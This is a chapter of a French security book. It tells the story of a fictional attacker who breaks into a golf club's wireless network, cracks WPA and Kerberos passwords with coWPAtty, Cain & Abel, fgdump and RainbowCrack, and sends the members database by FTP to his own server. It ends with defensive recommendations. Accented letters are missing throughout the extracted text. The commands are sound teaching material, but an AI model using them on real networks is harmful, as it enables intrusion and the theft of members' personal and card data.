Les pirates ciblent les populations aises pour diverses raisons : trac de drogue, trac de papiers didentit pour les immigrants clandestins et lassurance sant, vente dinformations de valeur pour diverses activits criminelles sur Internet. De nombreux clubs et golfs nacceptent plus, de nos jours, les paiements en liquide pour les vnements du club, les activits, la nourriture, les boissons et le golf. Une rcente publicit dans un journal de Fort Myers, en Floride, pour un club de golf, indiquait "Argent liquide non accept". Les clubs acceptent et conservent les numros de cartes de crdit des membres et de leurs invits, ainsi que les adresses, photos, donnes personnelles et historiques de crdit. Accder aux rseaux via les points daccs sans-l Grce leur souplesse, leur faible cot et leur facilit dinstallation, les rseaux sans-l sont de plus en plus nombreux. Selon les estimations de In-Stat/MDR (www.instat.com), il y a actuellement plus de 100 millions de rseaux sans-l dans le monde. Ce nombre phnomnal de priphriques daccs sans-l a offert un lan considrable une nouvelle gnration de pirates spcialiss dans les mthodes de piratage de communications et de donnes. Certains pirates sirotent un caf au troquet local en exploitant leurs cibles, tandis que dautres choisissent la voie plus lucrative de semer la pagaille depuis le parking dinstitutions nancires, dcoles, de PME et des lieux o les plus fortuns se dtendent : les clubs de golf privs.

Chane dexploits
Cette section dtaille la chane dexploits de Phnix :
m m m m

la connexion un point daccs ; lattaque de la pr-authentication Microsoft Kerberos ; le craquage des mots de passe avec RainbowCrack ; le vol des donnes du club.

Cette section se termine par un rsum de cette chane dexploits. Connexion un point daccs Phnix dcide de visiter les environs. Par ailleurs, jeter un il lintrieur du pavillon ne peut pas faire de mal. Il attrape ses clubs de golf et les emporte dans la zone prvue pour leur stockage. Un jeune homme nergique se prcipite pour prendre ses clubs et

250

Chanes dexploits

lui demande quelle heure est sa partie. Phnix explique quil na pas de partie prvue et quil esprait pouvoir se joindre une partie ou jouer quelques balles sur le terrain dexercice. Il demande ensuite sil peut utiliser les toilettes. Le jeune homme lui indique la direction du pavillon. Phnix se dirige vers le pavillon et, une fois lintrieur, cherche quelquun qui utilise un ordinateur ou un appareil sans-l. Il passe dans une pice o deux personnes sont assises avec des portables. Il voit un point daccs Linksys sans-l WAP54G et demande ces personnes, lair de rien, si elles connaissent lESSID et le mot de passe pour quil puisse mettre jour son ordinateur en attendant sa partie. On lui rpond que cette information se trouve dans sa facture mensuelle. Ces gens ne lui facilitent pas la tche ; il retourne sa voiture. Il va maintenant sniffer les ondes pour obtenir toutes les informations possibles. Il espre un point daccs grand ouvert, sans chiffrement et avec un ESSID diffus, comme illustr la Figure 8.1.

Figure 8.1
Connexion rseau non scurise.

Son second choix serait un point daccs en WEP et diffusant son ESSID, comme le montre la Figure 8.2 : il sait quil peut craquer du WEP trs rapidement. Mais il ne trouve aucun ESSID diffus, et son cran afche une fentre identique celle de la Figure 8.3.

Chapitre 8

Panique au club de golf

251

Figure 8.2
Rseau scuris avec une diffusion de lESSID.

Figure 8.3
Aucune connexion rseau sans-l nest diffuse.

252

Chanes dexploits

Il insre dans le lecteur un CD amorable de Linux nomm Backtrack. Il sagit dune distribution live base sur Kubuntu et contenant des centaines doutils de scurit. Loutil quil choisit est le scanner Wi-Fi Kismet, illustr la Figure 8.4. Il dmarre le scanner pour voir sil peut rcuprer une adresse MAC et lESSID du rseau.

Figure 8.4
Scanner Wi-Fi Kismet.

Le premier challenge quil rencontre est dobtenir lESSID du point daccs. Cette opration est ncessaire pour lancer une attaque par coWPAtty. Si lESSID nest pas diffus, il a plusieurs choix. Il peut manipuler une personne du pavillon, ce qui serait relativement simple, mais il na pas envie de quitter le confort et la fracheur de sa BMW. Il peut aussi lancer Kismet et surveiller le trac pendant une priode de temps relativement leve. LESSID sera diffus lorsquun ordinateur cherchera se connecter au rseau. Il peut nalement utiliser un outil tel que void11 (http://www.wirelessdefence.org/Contents/Void11Main.htm) ou ESSID-JACK (qui fait partie de AirJack, disponible ladresse http://802.11ninja.net), qui oblige les ordinateurs associs au point daccs se dissocier puis se rassocier. Cela implique que les ordinateurs

Chapitre 8

Panique au club de golf

253

envoient une requte au point daccs, ce qui induit le dialogue en quatre tapes prsent la Figure 8.5 : 1. Le point daccs (PA) envoie un nombre unique cr pour loccasion la station (STA) (ANonce). Le client a maintenant de quoi crer une PTK (Pairwise Transient Key). 2. STA envoie galement un nombre unique (SNonce) au PA, accompagn dun MIC (Message Integrity Code). 3. Le PA envoie la GTK (Group Temporal Key) et un numro de squence, ainsi quun autre MIC. Le numro de squence est le numro de squence utilis dans la prochaine trame multicast ou broadcast pour que STA puisse effectuer une dtection basique dattaque par rejeu. 4. STA envoie une conrmation PA.

STA ANonce

PA

STA construit la PTK SNonce + MIC

PA construit la PTK GTK + MIC Ack

Figure 8.5
Dialogue en quatre tapes.

Phnix doit capturer ce dialogue. Pour craquer le point daccs, il a besoin de ce trac, du SSID et dun chier de dictionnaire.

254

Chanes dexploits

Grce son exprience, Phnix na besoin de sniffer le rseau avec Kismet que pendant dix minutes avant de rcuprer lESSID illustr la Figure 8.6.

Figure 8.6
Scan des points daccs par Kismet.

Kismet enregistre les traces rseau. Si Phnix louvre dans Wireshark (voir Figure 8.7), il pourra voir le dialogue en quatre tapes. Il doit ltrer tous les protocoles lexception dEAPOL (EAP [Extensible Authentication Protocol] over LAN). Si Phnix navait pas eu la chance de voir passer ce dialogue, il aurait d forcer la dissociation avec un des outils prcdemment mentionns1. Il est important de disposer du chier de capture au format libpcap contenant le dialogue en quatre tapes. Phnix souponne que le rseau utilise du WPA-PSK et, pour cela, il a besoin de coWPAtty. Pour utiliser ce logiciel, il a besoin de lESSID et de diverses informations. Il dmarre donc Microsoft Windows XP et congure sa carte sans-l avec lESSID du point daccs. Il regarde la fentre prsentant les rseaux

1. N.D.T. : La dtection de ce type de dialogue dpend aussi de la carte rseau sans-l employe.

Chapitre 8

Panique au club de golf

255

Figure 8.7
Wireshark.

disponibles, qui afche effectivement un rseau WPA, illustr la Figure 8.8, exactement comme Phnix le souponnait.
Failles du chiffrement WEP Phnix esprait un chiffrement WEP car celui-ci prsente de srieuses failles de scurit. Le gnrateur de cls utilis par de nombreux fabricants utilise une gnration de cls faible sur 40 bits. Avec un ordinateur portable classique, Phnix pourrait craquer une cl de 40 bits en quelques minutes grce sa mise en uvre dfaillante de RC-4. Le problme vient de la violation du principe selon lequel il ne faut jamais rutiliser la mme cl. Une autre faille de WEP est lalgorithme de planification de cls, dcouvert par Fluhrer, Mantin et Shamir. Des outils communs, comme Aircrack-ng, WEPCrack et dweputils peuvent exploiter cette faiblesse. Ces outils peuvent craquer une cl WEP en analysant le trafic grce des captures passives de paquets.

256

Chanes dexploits

WPA

Figure 8.8
Loutil de connexion au rseau sans-l afche un chiffrement WPA.

Il doit maintenant craquer le WPA et, pour cela, utiliser coWPAtty. Malheureusement, cet utilitaire ne se trouve pas sur le CD. Phnix branche donc son modem 3G, tlcharge loutil ladresse http://www.willhackforsushi.com/Cowpatty.html et linstalle avec les commandes suivantes dans un shell Linux :
tar zxvf cowpatty-4.3.tgz cd cowpatty-4.3 make

Lutilisation de coWPAtty est relativement simple et il existe un menu daide :


./cowpatty cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com> cowpatty: Must supply a list of passphrases in a file with -f or a hash file with -d. Use "-f -" to accept words on stdin. Usage: cowpatty [options] -f Dictionary file -d Hash file (genpmk)

Chapitre 8

Panique au club de golf

257

-r -s -h -v -V

Packet capture file Network SSID (enclose in quotes if SSID includes spaces) Print this help information and exit Print verbose information (more -v for more verbosity) Print program version and exit

Il a galement besoin de trois informations vitales : lESSID, un dictionnaire et un chier de capture contenant le dialogue en quatre tapes qui a lieu pendant une association. Le dictionnaire contient tous les mots qui pourraient servir de passphrase. Le dictionnaire de Phnix est assez long : il y a ajout de nombreux termes au cours des annes. Il sait, dexprience, que les passphrases et ESSID sont gnralement bass sur le nom des entreprises ou, dans notre cas, celui du club de golf. Son dictionnaire contient donc des variations de Brighton Bay : Brighton Bay, brighton bay, brightonbay, Brightonbay, brightonBay, BRIGHTONBAY, BRIGHTON BAY, brighton, brighton1, brightonbay1, etc. Il lance coWPAtty avec la commande Linux suivante :
./cowpatty -r BrightonBay.dump -f dict -s AP1

La commande renvoie la sortie suivante :


cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com> Collected all necessary data to mount crack against WPA/PSK passphrase. Starting dictionary attack. Please be patient. key no. 1000: Abscissa key no. 2000: Athenaeum key no. 3000: bushmaster key no. 4000: combatant key no. 5000: deadlocked The PSK is "brighton" 5897 passphrases tested in 186.74 seconds: 31.58 passphrases/second

La PSK (Preshared Key, cl partage) est brighton. Il a maintenant tous les lments ncessaires pour accder au point daccs du club : lESSID (AP1), le type de chiffrement (WPA-PSK) et la PSK (brighton). Si cela navait pas fonctionn, ce qui arrive souvent faute de bon dictionnaire, Phnix aurait pu attaquer avec genpmk. Cet utilitaire, fourni avec coWPAtty, prgnre une table de hachage partir dun dictionnaire. Phnix peut ensuite utiliser cet lment pour attaquer la PSK.
./genpmk -f dict -d brightonhash -s AP1 Genpmk 1.0 - WPA-PSK precomutation attack. <jwright@hasborg.com> File brightonhash does not exist, creating.

258

Chanes dexploits

key no. 1000: Abscissa key no. 2000: Athenaeum key no. 3000: bushmaster key no. 4000: combatant key no. 5000: deadlocked 5898 passphrases tested in 186.03 seconds: 31.70 passphrases/second

Ce type dattaque ncessite que Phnix connaisse lESSID et quil ait cr un chier de hachage pour le fabricant du point daccs avec le bon ESSID. Une fois ce chier cr, ce qui prend environ trois minutes, Phnix peut lancer coWPAtty avec ce chier et lancer lattaque suivante :
./cowpatty -r BrightonBay.dump -d brightonhash -s AP1 cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com> Collected all necessary data to mount crack against WPA/PSK passphrase. Starting dictionary attack. Please be patient. The PSK is "brighton" 5897 passphrases tested in 0.12 seconds: 48718.23 passphrases/second

Phnix accde alors au point daccs. Cette tape ne lui a pris que quinze minutes. Maintenant quil est connect, il peut explorer le rseau et les chiers. Pour cela, il a besoin dun identiant et dun mot de passe avec des droits administrateur. Cest lobjet de lattaque qui suit. Attaque de la pr-authentication Microsoft Kerberos Phnix congure sa carte Wi-Fi avec les paramtres suivants :
m m m

LESSID est AP1. La passphrase est brighton. Le chiffrement est de type WPA-PSK.

Il est presque sr que le club utilise DHCP pour fournir des adresses IP. Cest effectivement le cas. Phnix a rcupr une adresse IP et peut consulter son courrier lectronique sur la messagerie dAOL. Il veut voir ce qui se trouve sur le rseau. Il utilise pour cela loutil nbtscan, un scanner NETBIOS, avec la commande suivante sous Windows :
nbtscan -f 172.18.1.0/24

nbtscan est trs rapide et sa sortie est trs lisible :


nbtscan 172.18.1.0/24 Doing NBT name scan for addresses from 172.18.1.0/24 IP Address NetBIOS Name Server User

MAC Address

Chapitre 8

Panique au club de golf

259

172.18.1.0 172.18.1.2 172.18.1.1 172.18.1.5 172.18.1.25 172.18.1.31 172.18.1.50

Sendto failed: Cannot assign requested address TCSHOME <server> <unknown> 00-0b-cd-21-1f-a9 Recvfrom failed: Connection reset by peer JVLAPTOPXP <server> <unknown> 00-02-3f-6a-13-7f NX9420 <server> <unknown> 00-19-d2-24-a5-e0 BRIGHTON1 <server> <unknown> 00-03-ff-20-1f-a9 INSTRUCTOR <server> <unknown> 00-03-ef-6c-13-7f

INFO Nbtscan est disponible ladresse http://unixwiz.net/tools/nbtscan.html.

Au vu de la sortie, on peut supposer que brighton1 est une station de travail ou un serveur appartenant Brighton Bay. Les autres noms dordinateur ne lui disent rien. Il sagit probablement de membres du club qui utilisent laccs sans-l. Il doit cependant trouver la mthode dauthentication quils utilisent. Sagit-il dActive Directory (Kerberos), de LM (Lan Manager) ou NTLM (NT Lan Manager) ? Il peut, pour cela, lancer Cain & Abel et attendre du trac didentication, comme illustr la Figure 8.9. Cain & Abel est un outil de rcupration de mots de passe pour les systmes dexploitation Microsoft. Il permet de retrouver divers types de mots de passe en sniffant le rseau, en craquant des mots de passe chiffrs grce des dictionnaires,

Figure 8.9
Scan de Cain & Abel.

260

Chanes dexploits

par force brute et par des attaques de cryptanalyse, en enregistrant des conversations VoIP (voice over IP), en dcodant des mots de passe, en rcuprant des cls de rseau sans-l, en afchant des champs de mots de passe cachs et en analysant des protocoles de routage. Cet outil peut tre tlcharg sur www.oxid.it/cain.html. Cain & Abel est trs utile lorsquil sagit de rcuprer des noms dutilisateurs et des mots de passe sur un rseau. Phnix espre que le club dispose toujours de concentrateurs rseau et non de commutateurs, mais, sils ont des commutateurs, il sait que Cain peut empoisonner le cache ARP. Il reoit les premiers paquets contenant des informations de connexion, comme le montre la Figure 8.10.

Figure 8.10
Cain & Abel afche le hachage de pr-authentication de Kerberos.

Phnix doit craquer le hachage. Il ne peut malheureusement pas craquer les hachages de pr-authentication de Kerberos avec des Rainbow Tables et va donc sappuyer sur une attaque par dictionnaire. Il nest pas inquiet : son dictionnaire est volumineux et il a dj russi craquer le mot de passe du point daccs. Il peut voir, grce Cain, lutilisateur MSmith. Cest la cible de Phnix. Si cet utilisateur na pas de droits administrateur, il cherchera des utilisateurs supplmentaires. Il lance le module de craquage de Cain pour obtenir le mot de passe de MSmith, comme le montre la Figure 8.11.

Chapitre 8

Panique au club de golf

261

Mot de passe

Figure 8.11
Cain & Abel afche le mot de passe de MSmith.

La sortie lui indique que le mot de passe de MSmith est brighton. Ce nest pas une surprise : la plupart des utilisateurs utilisent des mots de passe faibles. Il clique sur longlet Network, ajoute 172.18.1.31 (ladresse de brighton1) la liste daccs rapide et utilise MSmith, avec le mot de passe brighton, pour lancer la connexion Connect As et installer Abel sur brighton1, comme le montrent les Figures 8.12 et 8.13. Phnix essaie dinstaller Abel et cela fonctionne. MSmith doit avoir des privilges administrateur sur son ordinateur. Un petit bogue dans Abel peut amener Phnix devoir se dconnecter de la cible et sy reconnecter pour voir Abel, comme lillustre la Figure 8.14. Aprs avoir install Abel, Phnix peut ouvrir une invite de commande sur le PC compromis et y installer des programmes supplmentaires, comme fgdump. fgdump est un programme permettant lutilisateur dextraire les donnes de connexion caches des autres utilisateurs.

262

Chanes dexploits

Figure 8.12
Adresse IP saisie dans Cain & Abel.

Figure 8.13
Cain & Abel afche comment installer Abel.

Chapitre 8

Panique au club de golf

263

Figure 8.14
Cain & Abel montre Abel install.

Craquer des mots de passe avec RainbowCrack Obtenir les mots de passe Active Directory dautres utilisateurs est important. Si lutilisateur courant na pas de droits administratifs sur le domaine, Phnix doit trouver un utilisateur pour lequel cest le cas. Si le mot de passe est complexe ou long, Cain peut ne pas russir le craquer. Si Cain ne peut pas craquer le mot de passe, Phnix doit continuer sniffer le rseau et obtenir des hachages de mots de passe lorsquils transitent sur le rseau, par exemple quand un utilisateur accde des ressources rseau telles quune imprimante ou un rpertoire partag. RainbowCrack permet de craquer extrmement rapidement des mots de passe grce la technique du plus rapide compromis temps-mmoire de Philippe Oechslin. RainbowCrack est disponible ladresse http://project-rainbowcrack.com/. Pour craquer un mot de passe avec RainbowCrack, Phnix doit dabord crer un jeu de Rainbow Tables pour une taille de mot passe, un ensemble de caractres et un algorithme de hachage comme NTLM. Il capture un hachage de mot de passe alors quil passe sur le rseau. La capture est mene en sniffant le rseau avec Cain. Les commandes Windows suivantes permettent de gnrer un ensemble de tables pour essayer de craquer le hachage de mot de passe :

264

Chanes dexploits

rtgen rtgen rtgen rtgen rtgen

ntlm ntlm ntlm ntlm ntlm

alpha alpha alpha alpha alpha

1 1 1 1 1

7 7 7 7 7

0 1 2 3 4

2100 2100 2100 2100 2100

8000000 8000000 8000000 8000000 8000000

all all all all all

Il obtient, grce cela, cinq chiers :


m m m m m

ntlm_alpha#1-7_0_2100x8000000_all.rt ; ntlm_alpha#1-7_1_2100x8000000_all.rt ; ntlm_alpha#1-7_2_2100x8000000_all.rt ; ntlm_alpha#1-7_3_2100x8000000_all.rt ; ntlm_alpha#1-7_4_2100x8000000_all.rt.

Une fois les cinq chiers gnrs, il doit les trier car RainbowCrack naccepte que les chiers tris. Phnix les trie donc avec les commandes suivantes :
rtsort rtsort rtsort rtsort rtsort ntlm_alpha#1-7_0_2100x8000000_all.rt ntlm_alpha#1-7_1_2100x8000000_all.rt ntlm_alpha#1-7_2_2100x8000000_all.rt ntlm_alpha#1-7_3_2100x8000000_all.rt ntlm_alpha#1-7_4_2100x8000000_all.rt

Cela gnre des tables en texte brut pour les mots de passe en majuscules passs lalgorithme de hachage NTLM. Phnix est enn prt craquer le mot de passe. Le chier de hachage cr par Cain sappelle Brightonhash.txt. Une fois le chier de hachage cr, Phnix excute la commande suivante pour rendre la table lisible RainbowCrack :
rcrack f:\rainbowcrack\*.rt -f brightonhash.txt

On aurait pu supposer que Phnix avait dj plus de cent gigaoctets de tables avec lui, sur un disque dur externe. En pratique, il sait que chaque situation est diffrente et quil vaut mieux gnrer les tables au besoin. Phnix a russi installer Abel. Il a lanc une ligne de commande, ouvert un client FTP et copi fgdump, qui peut tre tlcharg ladresse www.foofus.net/zzgig/fgdump/. fgdump rcupre les hachages de donnes de connexion du PC et les copie dans un chier texte. Lorsquil a les hachages, Phnix peut les passer une attaque par dictionnaire ou les soumettre aux tables Rainbow Tables. Il copie lexcutable dans le rpertoire Windows\Temp\ et lance fgdump avec la commande suivante :
fgdump

Chapitre 8

Panique au club de golf

265

Les rsultats sont deux hachages, celui de MSmith et celui de plarson, comme le montre la Figure 8.15.

Figure 8.15
Cain & Abel montre une sortie de fgdump.

Il soumet ensuite les hachages aux tables arc-en-ciel grce la commande suivante :
rcrack f:\rainbowcrack\*.rt -f brightonhash.txt

Les rsultats sont les suivants :


reading ntlm_alpha_0_2100x8000000_bla.rt ... 128000000 bytes read, disk access time: 4.19 s verifying the file ... searching for 2 hashes ... plaintext of 4269777C80276821 is 3231963 plaintext of E069108CFF9A5BC1 is brighton cryptanalysis time: 5.61 s

Phnix a dcouvert deux mots de passe : 3231963 et brighton.

266

Chanes dexploits

Vol des donnes du club prsent que Phnix dispose de deux noms dutilisateur et de leurs mots de passe, il commence chercher des donnes en ouvrant une invite de commande sur brighton1 grce Cain. Il trouve un rpertoire nomm membres avec une base de donnes nomme membres.accdb. Il copie ce chier sur le serveur FTP de son domicile : il ouvre une invite de commande Windows et saisit les commandes suivantes :
ftp 65.36.59.56 Utilisateur: Mot de passe: send C:\membres\membres.accdb members.accdb

Phnix tente dinstaller Abel sur 172.18.1.50, mais il choue car 172.18.1.50 est contrleur de domaine et seuls les administrateurs rseau sont autoriss sy connecter. Il a un autre nom dutilisateur et un autre mot de passe tester : plarson, avec le mot de passe 3231963. Il ressaie dinstaller Abel sur le PC ; a fonctionne cette fois. Il sagit dune information importante. Si plarson peut se connecter et installer des logiciels sur un contrleur de domaine, il doit avoir des droits administratifs sur le domaine. Il cherche nouveau des chiers et trouve ce quil cherchait : un rpertoire nomm Jonas. Il sait que Jonas Software (www.jonassoftware.com) est un des logiciels utiliss pour la gestion de tels clubs privs. Ce logiciel contient probablement des masses dinformations personnelles sur les membres du club. Phnix rcupre le rpertoire complet sur son serveur FTP. Il termine ensuite ses sessions et rentre chez lui. Il sait quil na plus qu charger les donnes sur un des sept serveurs qui font tourner des programmes de gestion de clubs privs, lire les donnes, et tout le monde connat la suite. Si les bases de donnes posent des problmes, il pourra toujours craquer le chiffrement avec Cain & Abel. Phnix a des numros de cartes de crdit ; il peut contacter son associ laccent tranger et changer ces informations contre de largent. Rsum de la chane dexploits Phnix a enchan les exploits suivants : 1. Il a pirat un point daccs sans-l pour accder au rseau sans-l du club priv. 2. Il a craqu la pr-authentication de Kerberos pour obtenir des mots de passe.

Chapitre 8

Panique au club de golf

267

3. Il a craqu des mots de passe avec des Rainbow Tables. 4. Il a utilis les accs administrateur des mots de passe craqus pour trouver et voler les donnes des membres du club.

Mesures de prvention
Cette section dcrit diverses mesures de prvention que vous pouvez dployer contre les exploits de cette chane. Scurisez les points daccs Le club a dploy des points daccs sans-l, mais ne les a pas mis en uvre correctement. Le point daccs tait le vecteur dattaque dans ce scnario. Voici quelques suggestions pour la mise en uvre correcte de points daccs sans-l :
m

Les points daccs devraient se trouver devant le pare-feu. Si les utilisateurs internes qui utilisent le point daccs veulent utiliser le rseau interne, ils doivent sy connecter par un VPN. Si des personnes extrieures veulent utiliser le point daccs pour accder Internet, elles doivent pouvoir le faire sans mettre en jeu la scurit du rseau interne. Cela aurait rendu la tche de Phnix plus difcile car cela aurait ajout une couche supplmentaire de scurit au rseau. En plus dun VPN, le WPA2 doit tre dploy avec une passphrase forte. LIEEE indique que celle-ci doit se composer dau moins vingt caractres. Le WPA autorise un minimum de huit caractres, mais ce nest pas sufsant. Les passphrases courtes facilitent les attaques par dictionnaire. Cela aurait ralenti Phnix, peut-tre sufsamment pour le dcourager. Si le point daccs doit tre interne au rseau, il doit tre dploy avec lauthentication de ports 802.1x. Cela peut coter plus dargent car les commutateurs bas de gamme ne la prennent pas en charge. Lauthentication peut tre mene par une entit tierce, comme un serveur RADIUS (voir Figure 8.16). Cela fournit une authentication des seuls clients ou, de manire plus approprie, une authentication mutuelle forte grce des protocoles comme EAP-TLS. Le DHCP peut tre utilis. Mais il faut limiter le nombre dadresses IP quil peut distribuer. Dans le scnario prcdent, le rseau faisait usage de DHCP, mais celuici tait mal congur. Si vous limitez le nombre dadresses IP distribues, vous pouvez contrler le nombre dindividus sur votre rseau.

268

Chanes dexploits

Serveur dauthentification (RADIUS)


Rs

eau sans fil

AS Responsable de lauthentification 1 AP 2 WN Demandeur 3


Internet ou ressources LAN

Figure 8.16
Rseau sans-l quip dun serveur RADIUS.

Ne diffusez pas lESSID. Dans le scnario prcdent, lESSID ntait pas diffus ; ctait une tape correcte, malheureusement prcde et suivie de plusieurs mauvais choix. LESSID doit tre diffrent de celui qui est fourni par dfaut. Filtrez si possible par adresse MAC. Ce nest pas la panace des mesures de scurit, comme pour la plupart des mesures de scurit, mais cest une bonne ide de congurer ce ltrage, mme si la seule raison est doffrir un obstacle de plus un pirate souhaitant accder votre rseau. La meilleure dfense se compose de lignes successives. Installez le point daccs dans son propre sous-rseau et interdisez tout trac vers les autres sous-rseaux. De bons pare-feu et commutateurs peuvent segmenter votre rseau. Cela permet de garder spars certains ordinateurs et quipements rseau. Si le point daccs est utilis comme point daccs Internet, installez une connexion Internet spare, comme une seconde ligne ADSL ou un modem cble.

Si ces mesures avaient t prises, le pirate aurait d trouver un autre vecteur dattaque. Congurez convenablement Active Directory Les bonnes pratiques suivantes pour la conguration dActive Directory vous aideront scuriser votre rseau contre ce type dattaques :

Chapitre 8

Panique au club de golf

269

La politique de mots de passe a t relche pour faciliter lutilisation. La premire attaque sur lutilisateur MSmith via la pr-authentication Kerberos tait une attaque par dictionnaire. Comme le mot de passe tait faible, lattaquant a pu le craquer. MSmith avait des privilges dadministration sur son PC. Cela ne devrait jamais tre le cas. Lorsque les utilisateurs ont des privilges dadministration sur leur PC, ils peuvent, entre autres, installer des programmes et modier la base de registre. Phnix a pu installer Abel sur le PC de MSmith car ce compte disposait de privilges administratifs. Le cache dinformations douverture de session ntait pas dsactiv. Cela a permis lattaquant dutiliser fgdump pour rcuprer les hachages locaux des comptes du domaine qui staient connects sur ce PC. plarson avait des droits dadministrateur rseau. La bonne mthode pour donner des droits dadministration du domaine un utilisateur est de crer un second compte pour lutilisateur lorsquil a besoin deffectuer une opration ncessitant des droits dadministration. Le compte administrateur ntait pas dsactiv. Dans ce cas, lattaquant na pas exploit le compte. Cependant, sil avait eu un problme avec un des deux comptes, il aurait attaqu le compte administrateur. Souvenez-vous que le compte administrateur ne peut pas tre exclu. Il peut cependant tre dsactiv. Activez les audits. Cela nempchera sans doute pas les attaques, mais aidera les autorits trouver lattaquant et rparer les vulnrabilits. Activez loption de scurit qui consiste teindre le systme si le journal de scurit se remplit. Chiffrez vos canaux de donnes scurises. Afchez un message lorsquun utilisateur se connecte, indiquant que laccs lordinateur nest valide que pour les personnes autorises. Cela nvitera pas les attaques, mais peut vous aider en cas de procs. Nutilisez pas les niveaux dauthentication LM ou NTLM. Forcez le niveau NTLMv2 et refusez LM et NTLM. Naffaiblissez pas la politique de mots de passe par dfaut. Si vous la modiez, il faut que ce soit pour la renforcer. La dure de verrouillage de compte doit tre zro, ce qui signie quun administrateur doit dverrouiller le compte.

m m

270

Chanes dexploits

Le seuil de verrouillage de compte doit tre cinq tentatives errones cest le nombre maximum conseill. Le compteur de rinitialisation de compte devrait avoir une valeur minimale de 30 minutes. Les trois journaux dvnements (application, scurit et systme) devraient tre activs au niveau domaine.

Utilisez un systme de prvention ou de dtection dintrusion Un systme de prvention dintrusion (IPS) est un quipement de scurit qui permet de contrler laccs des ordinateurs pour les protger de lexploitation. Si un tel quipement avait t en place, une alarme se serait dclenche lorsque lattaquant aurait envoy des donnes sur son serveur FTP. Un systme de dtection dintrusion (IDS) dtecte de nombreux types de trac rseau et dusages informatiques malveillants quun pare-feu conventionnel ne dtecte pas. On peut en particulier compter les attaques rseau contre les services vulnrables, les attaques bases sur les donnes des applications, les attaques sur les htes comme llvation de privilges, les accs non autoriss et les accs aux chiers sensibles, et les excutables malveillants (virus, chevaux de Troie, vers). Lun ou lautre de ces systmes aurait t trs utile. Mettez jour votre antivirus rgulirement Un bon antivirus aurait pu dtecter Abel lorsque Phnix la install sur le PC et sur le serveur. Cela aurait compliqu la tche de lattaquant au moment de prendre pied sur le rseau. On peut citer comme exemples dantivirus ables Sophos, Symantec, AVG, Computer Associates (CA) et McAfee. Liste de contrle de scurit informatique Voici une liste de contrle pour la scurit des rseaux PC :
m

Le rseau est-il connect Internet via une ligne DSL, cble, ou toute autre connexion permanente ? Les connexions DSL ou cble sont les mthodes les plus populaires pour obtenir un accs haut dbit dans la plupart des entreprises. Si le client utilise ce type de mthode, il est trs vulnrable aux attaques car la connexion est toujours active. Ce type de connexion place les ordinateurs de lentreprise sur

Chapitre 8

Panique au club de golf

271

Internet, moins que lentreprise nait mis en uvre dautres mthodes de scurit appropries, comme nous allons les dtailler.
m

Le rseau dispose-t-il dun pare-feu (logiciel ou matriel) install et oprationnel tout moment ? Les pare-feu peuvent prendre la forme de programmes tels que BlackIce ou ZoneAlarm, ou dquipements ddis comme Sonicwall, Nokia/ Checkpoint ou Cisco PIX. Les pare-feu loignent les intrus (pirates) du rseau de lorganisation sils utilisent Internet comme vecteur dattaque. Comme Phnix la dmontr dans le scnario prcdent, une fois dans le rseau interne, les pirates peuvent faire beaucoup de dgts aux systmes dune entreprise. Ils peuvent voler ou dtruire des informations, faire planter le rseau ou utiliser le systme pour attaquer dautres rseaux. Assurez-vous que vos rseaux clients sont labri des dgts dun pirate ; les pare-feu font beaucoup pour cette scurit. Le rseau dispose-t-il dun systme de dtection/prvention dintrusion install et oprationnel tout moment ? Les systmes de dtection/prvention dintrusion constituent une mesure supplmentaire par rapport un pare-feu. Ces systmes examinent le trac rseau, cherchent identier des chiers ou activits suspects. Ils prennent le relais l o les pare-feu sarrtent et aident identier des attaques qui auraient pu passer le pare-feu. La scurit du rseau a-t-elle t teste par un sous-traitant indpendant externe ? Des tests priodiques de la scurit du rseau constituent le meilleur moyen de savoir si le rseau et ses systmes associs sont raisonnablement protgs. De tels tests sont effectus par des spcialistes de la scurit rseau qui utilisent certains outils employs par les pirates. Il est tonnant de voir le pourcentage dentreprises qui croient tre protges de manire adquate effectivement compromises par ce type de tests. Une fois les tests effectus, des recommandations sont mises pour assurer une mise en uvre satisfaisante de la scurit. cause de la complexit, de la sophistication et de la nature changeante des outils de test, les entreprises extrieures sont les mieux mme de mener de tels tests. Les quipements rseau tels que les routeurs, commutateurs et serveurs ont-ils t scuriss suivant les directives de leurs fabricants ? Cisco, Microsoft, Novell et les autres fabricants offrent des documentations dtailles sur la manire de scuriser leurs quipements et de les rendre difciles compromettre. Ne pas mettre en place ces politiques augmente le risque de brche dans les systmes et rseaux dune entreprise.

272

Chanes dexploits

Les mots de passe sont-ils modis priodiquement ? Les mots de passe sont une mesure de scurit relativement simple et lefcacit surprenante. Malheureusement, de nombreuses organisations nutilisent pas un systme de mots de passe efcace. Certaines attribuent le mme mot de passe plusieurs utilisateurs ou autorisent les utilisateurs garder le mme mot de passe pendant des mois ou des annes. Utilisez des passphrases plutt que des mots de passe par exemple "Jaimemangeritalien". Notez que ce mot de passe fait plus de 15 caractres et quil ne contient ni chiffre ni caractre spcial. RainbowCrack ne sait pas craquer ce mot de passe : il compare le hachage une table de hachages et drive le mot de passe du hachage. RainbowCrack est plus efcace sur les mots de passe de moins de 15 caractres car lalgorithme de hachage change normment aprs 15 caractres. Le systme maintient-il un journal des accs qui trace les accs des utilisateurs aux applications et serveurs ? Les rseaux avancs peuvent tracer toutes les activits dun utilisateur si la journalisation du systme est active. Les donnes et applications critiques sont-elles sauvegardes quotidiennement ? Cest un autre domaine dans lequel de nombreuses organisations sont laxistes. Toutes les donnes critiques devraient tre sauvegardes quotidiennement avec une politique de rtention de donnes dau moins trente jours. La protection des donnes devrait tre teste tous les mois. Le meilleur moyen de tester cela est de restaurer les donnes un emplacement diffrent pour ne pas craser les chiers courants. Cest uniquement ce moment que vous pouvez tre sr que votre stratgie de sauvegarde, quelle quelle soit, est oprationnelle. Les mdias de sauvegarde se trouvent-ils sur un autre site ? Une copie des donnes sauvegardes devrait tre stocke sur un site diffrent tous les jours. Gnralement, le mdia hors-site est celui de la veille. Il nest pas possible de prdire quand une catastrophe se produira ; une routine de sauvegarde hors-site quotidienne est une mesure importante pour protger les donnes de lorganisation. Les donnes sur site sont-elles correctement stockes ? Les mdias de sauvegarde sur site devraient tre conservs dans un placard ou un coffre labri du feu et des dgts des eaux. Les accs ces mdias devraient tre limits et le coffre devrait tre verrouill. Une technique relativement nouvelle de sauvegarde consiste utiliser un quipement qui surveille un ensemble de chiers et qui les sauvegarde ds que le bit darchive est modi. Cette technique offre deux avantages : elle permet de restaurer les donnes de 